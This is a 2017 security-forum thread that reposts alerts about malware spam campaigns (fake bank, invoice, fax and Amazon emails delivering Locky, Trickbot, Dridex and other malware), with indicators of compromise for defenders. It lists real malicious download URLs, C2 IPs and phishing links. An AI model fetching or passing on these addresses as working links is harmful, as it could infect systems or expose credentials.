View Full Version : SPAM frauds, fakes, and other MALWARE deliveries...
AplusWebMaster
2017-08-23, 11:54
FYI...
Fake 'purchase order' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-purchase-order-delivering-malware/
23 Aug 2017 - "... an email with the subject of 'RFQ072017' coming from Stafford Shawn <staffordshawn1@ yahoo .com> (possibly random senders) but definitely coming via Yahoo email network with a zip attachment containing a file that pretends to be a pdf file but is an .exe file... All detections on VirusTotal are heuristic or generic detections but it is quite well detected.
Update: I am reliably informed it is nanocore RAT 1.2.2.0...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/RFQ072017.png
SCAN_PO#20170823.PDF.z: Extracts to: SCAN_PO#20170823.PDF.z.exe - Current Virus total detections 23/64*
Payload Security**... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cd1127ef01e114ab7a88d64d13b0af0a8722ff3f8fc6f9acc043aa60c73567c5/analysis/1503458477/
** https://www.hybrid-analysis.com/sample/cd1127ef01e114ab7a88d64d13b0af0a8722ff3f8fc6f9acc043aa60c73567c5?environmentId=100
Contacted Hosts
185.12.45.79
___
Fake 'Ref' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-barclays-bank-ref-72381821-delivers-trickbot-banking-trojan/
23 Aug 2017 - "An email with the subject of 'Ref: 72381821' pretending to come from Barclays Bank but actually coming from a look-a-like domain Barclays <message@ barclaysmail .co.uk> -or- Barclays <message@ barclays-mail .co.uk> with a malicious word doc attachment is today’s latest spoof of a well known company, bank or public authority delivering Trickbot banking Trojan... spoofed domains are barclaysmail .co.uk 46.21.147.128 AS35017 Swiftway Sp. z o.o. and barclays-mail .co.uk 85.93.88.35 malta2333.startdedicated .net AS8972 Host Europe GmbH...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Ref-72381821-fake-Barclays-email.png
Ref72381821.doc - Current Virus total detections 4/58*. Payload Security**... This malware file downloads from
http ://eva-wagner .net/picture_library/logo.png which of course is -not- an image file but a renamed .exe file that gets renamed to hgfudf.exe and autorun (VirusTotal 18/63***). An alternative download location is
http ://eva-poldi .at/logo.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/557f761f59fb14c02d53c0336906eab0b2f5d1fed50178b169971e7302d847d7/analysis/1503484026/
attachment20170823-17020-5y3sht.doc
** https://www.hybrid-analysis.com/sample/557f761f59fb14c02d53c0336906eab0b2f5d1fed50178b169971e7302d847d7?environmentId=100
Contacted Hosts
62.138.14.149
37.120.182.208
51.254.164.249
188.165.62.11
*** https://www.virustotal.com/en/file/688768dd8c7043e4d357490cf83d7597e33a1e8485ee1f0ed478cba45a21e212/analysis/
hgfudf.exe
eva-wagner .net: 148.251.26.133: https://www.virustotal.com/en/ip-address/148.251.26.133/information/
> https://www.virustotal.com/en/url/0285ff07a83ba1cb3492be118ee707240e8cf03d2318e9a0cd50b7316672b542/analysis/
eva-poldi .at: 62.138.14.149: https://www.virustotal.com/en/ip-address/62.138.14.149/information/
> https://www.virustotal.com/en/url/0832ae41560d47c66e568ce306f91b939c56b33ddc28f367f0fec73bfc36d639/analysis/
___
Fake 'Fax' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/locky-delivered-via-fake-free-fax-to-email-malspam/
22 Aug 2017 - "... series of Locky downloaders... an email with the subject of 'Fax from: (01242) 856225' [random numbers] pretending to come from Free Fax to Email <freefaxtoemail@ random email domain>...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Fax-from-01242-856225.png
Fax278044344f0dd0b.rar: Extracts to: Fax1423519vc18e7c3.js - Current Virus total detections 16/55*
Payload Security** - delivers /REjhb54 (VirusTotal ***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/794dcfdcc1362140eee6fcda11ddf239ab048a965bba634bb787321db9672cfa/analysis/1480616575/
-6dt874p53077.js
** https://www.hybrid-analysis.com/sample/372a3bede528be194ad35721b4ac25e71f687bdb0d1efe3ad428a23654014a0c?environmentId=100
Contacted Hosts
192.169.226.106
82.118.17.218
5.196.99.239
*** https://www.virustotal.com/#/file/61ab284b33d34fedb4725c0c3e5e1a2a4a3cc3767f29b10b87dd8598bfda2471/detection
??
:fear::fear: :mad:
AplusWebMaster
2017-08-24, 13:53
FYI...
Fake 'Invoice' SPAM - leads to Locky
- http://blog.dynamoo.com/2017/08/malware-spam-customer-service-copy-of.html
23 Aug 2017 - "This fairly generic spam leads to Locky ransomware:
Subject: Copy of Invoice 3206
From: "Customer Service"
Date: Wed, August 23, 2017 9:12 pm
Please download file containing your order information.
If you have any further questions regarding your invoice, please call Customer Service.
Please do not reply directly to this automatically generated e-mail message.
Thank you.
Customer Service Department
A -link-in-the-email- downloads a malicious VBS script, and because it's quite late I'll just say that Hybrid Analysis* has seen it all before. The download EXE (VT 21/64**) script POSTS to 5.196.99.239 /imageload.cgi (Just Hosting, Russia) which is in a network block that also had a fair bit of Angler*** last year, so I would recommend blocking all traffic to 5.196.99.0/24."
* https://www.hybrid-analysis.com/sample/edfc3cdcac9f81b412f3379c779e3c33d0745cc64e45e503d5ee98ec8d1067f6?environmentId=100
Contacted Hosts
212.89.16.143
46.183.165.45
62.109.16.214
5.196.99.239
216.58.204.132
216.58.204.142
** https://www.virustotal.com/en/file/09f1d49065108a595578ff86ff63a514d47d5496ab5c23f38cda1f0d57dd6cd1/analysis/
*** https://pastebin.com/D5pXvR1W
:fear::fear: :mad:
AplusWebMaster
2017-08-24, 20:21
FYI...
Fake 'Secure Message' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-bank-of-america-secure-message-delivers-trickbot-banking-trojan/
24 Aug 2017 - "An email with the subject of 'Secure email message' pretending to come from Bank of America but actually coming from a look-a-like domain Bank of America <message@ bofamsg .com> or Bank of America <message@ bofa-msg .com> with a malicious word doc attachment is today’s latest spoof of a well known company, bank or public authority delivering Trickbot banking Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/bofa_securemessage_email.png
SecureMessage.doc - Current Virus total detections 7/58*. Payload Security**. This malware file downloads from
http ://esp .jp/serca.png which of course is -not- an image file but a renamed .exe file that gets renamed to Aoitas.exe (VirusTotal ***). An alternative download location is
http ://enyahoikuen .com/serca.png ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/38091a37753ed505bca29da77efaaf6d811b219ff1c4758cbf9f3ee9f2941ffa/analysis/
SecureMessage.doc
** https://www.hybrid-analysis.com/sample/38091a37753ed505bca29da77efaaf6d811b219ff1c4758cbf9f3ee9f2941ffa?environmentId=100
Contacted Hosts
121.50.42.51
78.47.139.102
195.133.197.70
79.124.78.81
*** https://www.virustotal.com/en/file/01c71fda419afbeafa854a3576ac0aa75b600f4e671373e678b6bd10f9b74c77/analysis/
serca.png
esp .jp: 121.50.42.51: https://www.virustotal.com/en/ip-address/121.50.42.51/information/
> https://www.virustotal.com/en/url/8d8dc8d48d7f78c251abbf6ae882f91f2bc03823d5ced01f2a79778a0a973f3a/analysis/
enyahoikuen .com: 202.231.207.151: https://www.virustotal.com/en/ip-address/202.231.207.151/information/
> https://www.virustotal.com/en/url/e67ae37ab7fcdfba65d26b6d675558233704a1cbe1d2c39294860a2f35fe4cd1/analysis/
___
Fake 'BT bill' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/locky-delivered-by-fake-bt-bill/
24 Aug 2017 - "... Locky downloader... an email with the subject of 'New BT Bill' pretending to come from BT Business <btbusiness@ bttconnect .com> with a-link-in-the-body- of the email to download a zip file...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Locky_BT-bill.png
bill-201708.zip: Extracts to: bill-201708.exe - Current Virus total detections 19/65*. Payload Security**.
Currently all the copies I am seeing (hundreds of them) have -2- download links in the email body:
http ://kabbionionsesions .net/af/bill-201708.rar -and- http ://metoristrontgui .info/af/bill-201708.zip
-both- domains have been spreading Locky all day. The downloads are extremely slow but I eventually got the zip version. Also several emails with
http ://kabbionionsesions .net/af/download.php (currently 404) and
http ://kabbionionsesions .net/af/bill-201708.7z (also 404)...
The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/abacabfc7c6550bd8594fd0b758c3f890a01212fcc23d3a04b04f761684cc86e/analysis/1503597867/
bill-201708.exe
** https://www.hybrid-analysis.com/sample/abacabfc7c6550bd8594fd0b758c3f890a01212fcc23d3a04b04f761684cc86e?environmentId=100
Contacted Hosts
185.179.190.31
216.58.206.228
216.58.206.238
kabbionionsesions .net: 47.89.246.2: https://www.virustotal.com/en/ip-address/47.89.246.2/information/
> https://www.virustotal.com/en/url/26ef369848e40dbef13d71d98345686a99478da0f5c30e489274a5675a1c68bd/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-08-25, 13:41
FYI...
Fake 'Secure Message' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-lloyds-bank-you-have-a-new-secure-message-malspam-delivers-trickbot-banking-trojan/
25 Aug 2017 - "An email with the subject of 'You have a new secure Message' pretending to come from Lloyds Bank but actually coming from a look-a-like domain Lloyds Bank <message@ lloydsbankmsg .com> or Lloyds Bank <message@ lloydsbank-msg .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan... spoofed domains are lloydsbankmsg .com 46.21.147.242 and lloydsbank-msg .com 109.235.52.44 ...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/fake-lloyds-bank-secure-message-email.png
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/lloyds-bank-EncryptedMessage_doc.png
EncryptedMessage.doc - Current Virus total detections 6/58*. Payload Security**. This malware file downloads from
http ://fabianpfau .de/logo.png which of course is -not- an image file but a renamed .exe file that gets renamed to lnmflgf.exe (VirusTotal 13/65***). An alternative download location is
http ://evakrause .nl/logo.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f80b44c328c591b02b6f973765a8ca3faae11f1806f24f91e0f56348c092c502/analysis/1503657342/
EncryptedMessage.doc
** https://www.hybrid-analysis.com/sample/f80b44c328c591b02b6f973765a8ca3faae11f1806f24f91e0f56348c092c502?environmentId=100
Contacted Hosts
176.28.13.220
216.239.32.21
131.153.40.196
*** https://www.virustotal.com/en/file/6efcb43053ba277c989992f9ddee98cf6be65ca6e740f6434d94f9c900f15094/analysis/1503658322/
lnmflgf.exe
fabianpfau .de: 176.28.13.220: https://www.virustotal.com/en/ip-address/176.28.13.220/information/
> https://www.virustotal.com/en/url/ff48716e2d27b89b45c87bfe5985d48f8e21838e5308b542d6d02fa0f60694d1/analysis/
evakrause .nl: 94.126.70.16: https://www.virustotal.com/en/ip-address/94.126.70.16/information/
> https://www.virustotal.com/en/url/3ff9af82ba6eda5b7324eafd1100251c8210e1a7b12e4b3d82eeb6a392534f8c/analysis/
___
Fake 'Sage invoice' SPAM - leads to Locky
- http://blog.dynamoo.com/2017/08/malware-spam-your-sage-subscription.html
25 Aug 2017 - "This -fake- Sage invoice leads to Locky ransomware. Quite why Sage are picked on so much[1] by the bad guys is a bit of a mystery.
[1] http://blog.dynamoo.com/search?q=sage
Screenshot: https://1.bp.blogspot.com/-d685K3apnF8/WZ_feKBwrMI/AAAAAAAAMOg/IX2uHRL2T18gOmwmE1PE_LHpJgUFUaIkQCLcBGAs/s1600/sage.png
The link-in-the-email downloads a malicious RAR file. The samples I saw were closely clustered alphabetically.
helpmatheogrow .com/SINV0709.rar
hendrikvankerkhove .be/SINV0709.rar
heinverwer .nl/SINV0709.rar
help .ads .gov.ba/SINV0709.rar
harvia .uz/SINV0709.rar
The RAR file itself contains a malicious VBS script... with a detection rate of 19/56*, which attempts to download another component from:
go-coo .jp/HygHGF
hausgerhard .com/HygHGF
hausgadum .de/HygHGF
bromesterionod .net/af/HygHGF
hartwig-mau .de/HygHGF
hecam .de/HygHGF
haboosh-law .com/HygHGF
hbwconsultants .nl/HygHGF
hansstock .de/HygHGF
heimatverein-menne .de/HygHGF
Automated analysis of the file [1] [2] shows a dropped binary with a 39/64** detection rate, POSTing to 46.183.165.45 /imageload.cgi (Reg.Ru, Russia)
Recommended blocklist:
46.183.165.45 "
* https://virustotal.com/en/file/aa75f8ecb2a990615dc534155a15fd9d8ea99ca2db718e8bc6092dc07fda9b2c/analysis/
bill-201708.exe
1] https://malwr.com/analysis/ODY3NjZjZmYxNDk0NGU2ZTk4ZGM4MTQyMTEzNDU0MWY/
SINV0709.vbs
Hosts
203.183.65.225
46.183.165.45
2] https://www.hybrid-analysis.com/sample/aa75f8ecb2a990615dc534155a15fd9d8ea99ca2db718e8bc6092dc07fda9b2c?environmentId=100
Contacted Hosts
203.183.65.225
46.183.165.45
** https://www.virustotal.com/en/file/abacabfc7c6550bd8594fd0b758c3f890a01212fcc23d3a04b04f761684cc86e/analysis/
bill-201708.exe
... Fake 'Sage invoice' variant - delivers Locky
> https://myonlinesecurity.co.uk/your-sage-subscription-invoice-is-ready-deliver-locky-ransomware/
24 Aug 2017
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/sagetop_Your-Sage-subscription-invoice-is-ready.png
> https://www.virustotal.com/en/file/aa75f8ecb2a990615dc534155a15fd9d8ea99ca2db718e8bc6092dc07fda9b2c/analysis/1503606828/
SINV0709.vbs
15/57
SINV0711.docm - Current Virus total detections *. Payload Security**...
* https://www.virustotal.com/en/file/027d37e56f9878cb334d35ebe49080061f9c5436e6d7c8f67fd732fe3ff85001/analysis/1503602547/
SINV0711.docm
9/59
** https://www.hybrid-analysis.com/sample/027d37e56f9878cb334d35ebe49080061f9c5436e6d7c8f67fd732fe3ff85001?environmentId=100
Contacted Hosts
83.169.35.187
185.179.190.31
help.ads .gov.ba: 80.65.162.70: https://www.virustotal.com/en/ip-address/80.65.162.70/information/
> https://www.virustotal.com/en/url/c65403b44ae916a106beaaa56b292ef56587be3bbbcd1d4e0f68d9b6e2348ebb/analysis/
hausverwaltungfrankfurt .de: 83.169.35.187: https://www.virustotal.com/en/ip-address/83.169.35.187/information/
> https://www.virustotal.com/en/url/90001706c9220405b448c34fc994b51044b04ed0b0cce32cc6217d776d04699b/analysis/
___
Fake 'Voicemail' SPAM - leads to Locky
- http://blog.dynamoo.com/2017/08/malware-spam-voicemail-service-new.html
25 Aug 2017 - "The jumble of numbers in this spam is a bit confusing. Attached is a malicious RAR file that leads to Locky ransomware.
Subject: New voice message 18538124076 in mailbox 185381240761 from "18538124076" <6641063681>
From: "Voicemail Service" [vmservice@ victimdomain .tdl]
Date: Fri, August 25, 2017 12:36 pm
Dear user:
just wanted to let you know you were just left a 0:13 long message (number 18538124076)
in mailbox 185381240761 from "18538124076" <6641063681>, on Fri, 25 Aug 2017
14:36:41 +0300
so you might want to check it when you get a chance. Thanks!
--Voicemail Service
Attached is a RAR file containing a malicious VBS script. The scripts are all slightly different, meaning that the RARs are too... The VBS script is similar to this* (variable names seem to change mostly) with a detection rate of about 15/59**. Hybrid Analysis*** shows it dropping a Locky executable with a 18/65[4] detection rate which phones home to 46.17.44.153 /imageload.cgi (Baxnet, Russia) which I recommend that you block."
* https://pastebin.com/UK2MYHct
** https://virustotal.com/en/file/21207599eedb3ad315571fadcd3d843fbe2e213f1c9970208612a7834b170b55/analysis/
20170825_ID904754594.vbs
*** https://www.hybrid-analysis.com/sample/21207599eedb3ad315571fadcd3d843fbe2e213f1c9970208612a7834b170b55?environmentId=100
Contacted Hosts
216.58.208.206
92.51.164.62
185.179.190.31
46.17.44.153
216.58.213.132
216.58.206.238
95.141.44.61
4] https://www.virustotal.com/en/file/0f75c08edc81483acae170972d3f24dea05149295773badc126a61961525c251/analysis/
UYGgfhRDSaa
:fear::fear: :mad:
AplusWebMaster
2017-08-26, 13:22
FYI...
Fake 'DHL' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-dhl-global-freight-consignment-form-malspam-delivers-malware/
26 Aug 2017 - "... an email with the subject of 'DHL GLOBAL FREIGHT CONSIGNMENT FORM' coming from DHL GLOBAL WORLD WIDE AGENT <deddi@ karebet-group .com> with an .ace attachment delivers malware... returns are coming back from several antivirus companies describing this as .Win32.SpyEyes[1]...
1] https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Spyeye
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/DHL-GLOBAL-FREIGHT-CONSIGNMENT-FORM.png
DHL GLOBAL Consignment form……………………………..ace: Extracts to: Purchase order.exe
Current Virus total detections 17/65*. Payload Security**. This drops a modified version of itself as win32.exe (VirusTotal 17/64***) it also contacts
http :// 98.142.221.58/~comsgautopart/.regedit/mail/home/gate.php ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9de4b1aef8adaf1eef2a22d5007a03509cf8496bddf94e8494ece49b03cfc47d/analysis/1503723385/
Purchase order.exe
** https://www.hybrid-analysis.com/sample/9de4b1aef8adaf1eef2a22d5007a03509cf8496bddf94e8494ece49b03cfc47d?environmentId=100
*** https://www.virustotal.com/en/file/ebc2d9c654484ae422723adeeee984475925da8d1e4818964358dc35abcb8dc1/analysis/1503723627/
win32.exe
98.142.221.58: https://www.virustotal.com/en/ip-address/98.142.221.58/information/
___
Fake 'Purchase Contract' SPAM - delivers java adwind
- https://myonlinesecurity.co.uk/purchase-contract-of-po30po31-delivers-java-adwind/
26 Aug 2017
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Purchase-Contract-of-PO30-PO31.png
Doc Purchase Contract of PO30PO31.jar (547kb) - Current Virus total detections *. Payload Security**...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ab5e1ec1d34db49ec6ecbdf92c8025397f1a4953e6d7a0277a1bfbeecc2233cf/analysis/1503773842/
Doc Purchase Contract of PO30PO31.jar
** https://www.hybrid-analysis.com/sample/ab5e1ec1d34db49ec6ecbdf92c8025397f1a4953e6d7a0277a1bfbeecc2233cf?environmentId=100
Contacted Hosts
5.178.43.16
:fear::fear: :mad:
AplusWebMaster
2017-08-28, 20:58
FYI...
Defray - New Ransomware targets Education and Healthcare
> https://www.helpnetsecurity.com/2017/08/28/custom-ransomware-delivered/
Aug 28, 2017
>> https://www.darkreading.com/application-security/new-targeted-ransomware-hits-healthcare-manufacturing-/d/d-id/1329725
8/25/2017
> https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals
Aug 24, 2017 - "... distribution of Defray has several notable characteristics:
Defray is currently being spread via Microsoft Word document attachments in email
The campaigns are as small as several messages each
The lures are custom crafted to appeal to the intended set of potential victims
The recipients are individuals or distribution lists, e.g., group@ and websupport@
Geographic targeting is in the UK and US
Vertical targeting varies by campaign and is narrow and selective
On August 22, Proofpoint researchers detected an email campaign targeted primarily at Healthcare and Education involving messages with a Microsoft Word document containing an embedded executable... Defray may cause other general havoc on the system by -disabling- startup recovery and -deleting- volume shadow copies. On Windows 7 the ransomware monitors and kills running programs with a GUI, such as the task manager and browsers. We have not observed the same behavior on Windows XP..."
Indicators of Compromise (IOCs) [ ... more listed at the proofpoint URL above. ]
C&C IP
145.14.145.115: https://www.virustotal.com/en/ip-address/145.14.145.115/information/
:fear::fear: :mad:
AplusWebMaster
2017-08-29, 12:32
FYI...
Fake 'BT bill' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-bt-bill-pretending-to-come-from-your-own-email-address-or-company-delivers-locky-ransomware/
29 Aug 2017 - "... Locky downloader... email has the subject of 'Overdue BT bill' pretending to come from random names at your-own-email-address...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/overdue-BT-bill.png
Scan_201708293861.zip: Extracts to: scan_201708292366.zip which eventually extracts to scan_201708292366.vbs - Current Virus total detections 11/59*. Payload Security**... first attachment I chose leads to a site giving a 404 so the results are very good. Another attachment gives better results
(VirusTotal 0/58***) where another researcher has filled in all then blanks in the comments[4]...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/df2a29cac64eb1e1a266622a208cb813178cb91b043e1a40a92abd3c73d85f46/analysis/1503998928/
scan_201708292366.vbs
** https://www.hybrid-analysis.com/sample/df2a29cac64eb1e1a266622a208cb813178cb91b043e1a40a92abd3c73d85f46?environmentId=100
Contacted Hosts
81.2.195.144
*** https://www.virustotal.com/en/file/6f004bb661bc9861e3730ebfdc8c50f356c8309a1dece632daa0466e3eae807a/analysis/1503999225/
4] https://twitter.com/Racco42/status/902465569965973504
> https://www.virustotal.com/en/file/a116850c789d42bcc00f3338ca155690faed30a377bb06ca1919ab9bda1585a7/analysis/1503999480/
9/65
___
Fake 'scan' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/you-have-received-a-scan-from-at-management-malspam-delivering-locky-ransomware/
29 Aug 2017 - "... Locky downloader... an email with the subject of 'You have received a scan from AT Management' pretending to come from Scan @ AT Management <scan_754@ atmanagement .co.uk> [random numbers after the scan_]. All these are being addressed to Accounts: <name@ victiomdomain .tld>...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/You-have-received-a-scan-from-AT-Management.png
... same sites, file names and payload as today’s earlier ^malspam run^ delivering Locky ransomware:
> https://myonlinesecurity.co.uk/fake-bt-bill-pretending-to-come-from-your-own-email-address-or-company-delivers-locky-ransomware/
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
___
Amazon phish...
- https://myonlinesecurity.co.uk/you-sold-an-item-spam-is-an-amazon-phishing-attempt/
29 Aug 2017 - "We see a lot of Amazon phishing attempts. This one is quite different to the usual ones we see. Although there are a lot of Amazon sellers, the chances of a mass malspam like this one actually being received by a seller is quite small compared with the more usual 'payment review' or 'your account was signed into from an unknown computer' or similar scams.
'You sold an item' pretending to come from Amazon <selleramazon@ reply.amazon .com> is one of the latest phish attempts to steal your Amazon Account and your Bank details. This one only wants your Amazon log in details and bank details. Many of them are also designed to specifically steal your email and other log in details as well...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Amazon_phishing_You_sold_an_item.png
The link-in-the-email goes to:
https ://www.google .co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&cad=rja&uact=8&ved=0ahUKEwiO9aOs-vvVAhXBZFAKHY3XCYgQFghJMAc&url=http%3A%2F%2Fwww.almatulum.com%2Fcontact-2%2F&usg=AFQjCNFdrv7025EsAfzW8QKj40lSrovIbA
which redirects to:
https ://directele .net/user_guide/documentation/amazon.co.uk/Amazon-Sign-In.htm?adenlankenadransakbnizwetmilrtuniietnnudbenwdiaateaaleeaallilaadmusmdzmnlelubbaalamzsnaittsndakaweiuidaawnamdlerendeuedimnailtrdtaknzeaanmleni4493782410
If you follow the link you see a webpage looking like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/amazon_phish_directele_net.png
When you fill in your user name and password you get a page looking like this, asking for your bank sort code and bank-account-number. I am not quite sure what they can do with this on its own without passwords or bank login details. However knowing that quite a high proportion of users do re-use login details and passwords on multiple sites, it is not beyond the realms of possibility that your Amazon account, email log in and bank log in all -share- a password:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/amazon_phish_directele_net_1.png
You then get -redirected- to the genuine Amazon suite for your country..."
directele .net: 166.62.73.164: https://www.virustotal.com/en/ip-address/166.62.73.164/information/
> https://www.virustotal.com/en/url/78c29502f16cead658556df495aa247343722f6de5b877c455612997d6db1909/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-08-30, 12:54
FYI...
Fake 'Emailing Payment' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/more-locky-ransomware-delivered-by-emailing-payment_201708-malspam/
30 Aug 2017 - "... Locky downloader... an email with the subject of 'Emailing: Payment_201708-838 [the “Emailing: Payment_201708-” stays consistent but the final 3 to 5 digits are random] pretending to come from random names at your-own-email-address or company-domain-addresses to another random name at your-own-domain...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Emailing-Payment_201708-838.png
Payment_201708-838.7z: Extracts to: Payment_201708-2866.jse - Current Virus total detections 14/59*.
Payload Security**. Locky payload: (VirusTotal 31/65***).
Another researcher has posted already about this one with several links to download sites and C2 IP numbers:
> https://hazmalware.wordpress.com/2017/08/29/2017-08-29-emailing-payment_201708-1234-leads-to-locky-ransomware/
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ff7b03ca1e1c00076c782d2fcdb2273fe7329f07d5618f63eaefeff2d75ba87c/analysis/1504067419/
** https://www.hybrid-analysis.com/sample/ff7b03ca1e1c00076c782d2fcdb2273fe7329f07d5618f63eaefeff2d75ba87c?environmentId=100
Contacted Hosts
81.90.36.32
46.183.165.45
74.125.206.106
8.250.3.254
74.125.206.106
*** https://www.virustotal.com/en/file/ce9469a6e37a26a7f6673ef1e63ba6b66162cfe8aaf68c2a6df075ebe0fe7886/analysis/
CuuDxa1.exe
146.120.110.46: https://www.virustotal.com/en/ip-address/146.120.110.46/information/
> https://www.virustotal.com/en/url/5a4464b5daf815639e2336e6e4d3ab0af14ea984815ffaa376402781044d3b58/analysis/
46.183.165.45: https://www.virustotal.com/en/ip-address/46.183.165.45/information/
> https://www.virustotal.com/en/url/7c70d748aecb36544a5fc1f3b478e96ae67332c3bb3c3c7cc74aa8403aa05f58/analysis/
___
Fake 'E-invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-apple-e-invoice-malspam-delivers-locky-ransomware/
30 Aug 2017 - "... Locky downloader... an email with the subject of 'E-invoice for your order #6377810026' [random numbers] pretending to come from do_not_reply@ random Apple email addresses.... the addresses I have seen include:
do_not_reply@ eu.apple .com
do_not_reply@ asia .apple.com
do_not_reply@us .apple .com ...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/E-invoice-for-your-order-6377810026.png
9891613510.7z: Extracts to: 9891611187.vbs - Current Virus total detections 10/59*. Payload Security**.
Locky Binary (VirusTotal 17/65***). These droppers have gone back to the old way of downloading Locky from the remote server, by downloading an encrypted text file that needs to be decoded by the script... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ccb37237584d7b3101a48e38f47a6a5e8c063fa714e27a8da2641e53d943629c/analysis/1504086697/
9891611187.vbs
** https://www.hybrid-analysis.com/sample/ccb37237584d7b3101a48e38f47a6a5e8c063fa714e27a8da2641e53d943629c?environmentId=100
Contacted Hosts
66.36.173.159
146.120.110.46
*** https://www.virustotal.com/en/file/3b1fae1e523e7d8615d557b0f977b5a02246c7caee2977baa79e2bf3bb9eaa0e/analysis/1504087141/
hJBoTJ.exe
___
Fake 'Secure email message' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/more-fake-natwest-emails-deliver-trickbot-banking-trojan/
30 Aug 2017 - "An email with the subject of 'Secure email message' pretending to come from NatWest bank but actually coming from a look-a-like domain noreply@ servicemessage### .ml with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan. The ### is any number between 501 and 599 - .ml domains are -free- domains administered by freenom .com... I am seeing domains ranging from servicemessage501 .ml to servicemessage599 .ml all being hosted on -different- IP numbers & ranges all appearing to be -compromised- ISP IP numbers from major ISPs in UK, Europe & USA...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/NatWest_servicemessage_ml.png
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/natwest1753465723087_352_doc.png
natwest1753465723087_352.doc - Current Virus total detections 6/58*. Payload Security**.
This malware file downloads from
http ://campuslinne .com/pages/kasaragarban.png which of course is -not- an image file but a renamed .exe file that gets renamed to Buqtjkk.exe (VirusTotal 12/64***). An alternative download location is
http ://campusassas .com/fonction/kasaragarban.png
This email attachment contains a genuine word doc with a macro script that when run will infect you...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9b54f1e19cd44ead8845394ddc5990387293dac96b7840f7823af9b651f18d51/analysis/
natwest1753465723087_352.doc
** https://www.hybrid-analysis.com/sample/9b54f1e19cd44ead8845394ddc5990387293dac96b7840f7823af9b651f18d51?environmentId=100
Contacted Hosts
193.227.248.241
158.69.26.138
178.156.202.206
*** https://www.virustotal.com/en/file/fbabcb0827d40e53a5cfd5c35c045fff26d0ea369f8ad95d5f2c1d05464102c5/analysis/
kasaragarban.png
campuslinne .com: 193.227.248.241: https://www.virustotal.com/en/ip-address/193.227.248.241/information/
> https://www.virustotal.com/en/url/7284e8db4dc8127ce3e4cd6bef9223a6b98ee065e082cd43751bca507f12740d/analysis/
campusassas .com: 193.227.248.241
> https://www.virustotal.com/en/url/e86bc2bac65ee901ccc2f40b37131eb8771be7938c976d7fe5c99bf8734ee05c/analysis/
___
Fake 'BT OneBill' SPAM - leads to Dridex
- https://myonlinesecurity.co.uk/fake-your-latest-bt-onebill-is-available-now-malspam-leads-to-dridex-banking-trojan/
30 Aug 2017 - "An email with the subject of 'Your latest BT OneBill is available now' pretending to come from BT but actually coming from a different domain ebilling4business@ btdnet .com that can just about be mistaken for a genuine BT email address is today’s latest spoof of a well-known company, bank or public authority delivering Dridex banking Trojan... Today’s example of the spoofed domains are, as usual, registered via eranet .com as registrar. This was registered on 29 August 2017 by the criminals:
btdnet .com hosted on 54.36.30.168 OVH
